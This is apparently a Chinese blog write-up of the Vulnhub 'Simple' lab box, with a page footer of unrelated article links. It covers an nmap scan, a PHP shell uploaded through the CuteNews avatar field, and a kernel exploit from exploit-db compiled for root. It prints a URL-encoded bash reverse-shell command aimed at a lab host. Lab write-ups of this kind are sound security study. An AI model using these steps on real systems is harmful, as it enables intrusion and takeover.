[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
会员果汁几秒前
网络工程-路由策略概述
网络
mounter6256 小时前
【硬核前沿】CXL 深度解析:重塑数据中心架构的“高速公路”,Linux 内核如何应对挑战?-- CXL 协议详解与 LSF/MM 最新动态
linux·服务器·网络·架构·kernel
ACP广源盛139246256738 小时前
破局 Type‑C 切换器痛点@ACP#GSV6155+LH3828/GSV2221+LH3828 黄金方案
c语言·开发语言·网络·人工智能·嵌入式硬件·计算机外设·电脑
嵌入式小企鹅10 小时前
蓝牙学习系列(八):BLE L2CAP 协议详解
网络·学习·蓝牙·ble·协议栈·l2cap
广州灵眸科技有限公司11 小时前
为RK3588注入澎湃算力:RK1820 AI加速卡完整适配与评测指南
linux·网络·人工智能·物联网·算法
byoass11 小时前
csdn_upload_005
网络·安全·云计算
IT WorryFree11 小时前
飞塔防火墙与第三方设备进行IPSEC故障诊断期间,用户可能会观察到以下错误:
linux·服务器·网络
不是书本的小明13 小时前
K8S应用优化方向
网络·容器·kubernetes
~plus~14 小时前
.NET 8 C# 委托与事件实战教程
网络·c#·.net·.net 8·委托与事件·c#进阶
w61001046615 小时前
CKA-2026-Service
linux·服务器·网络·service·cka
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程06实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了07CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09Oh My Codex 快速使用指南10开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案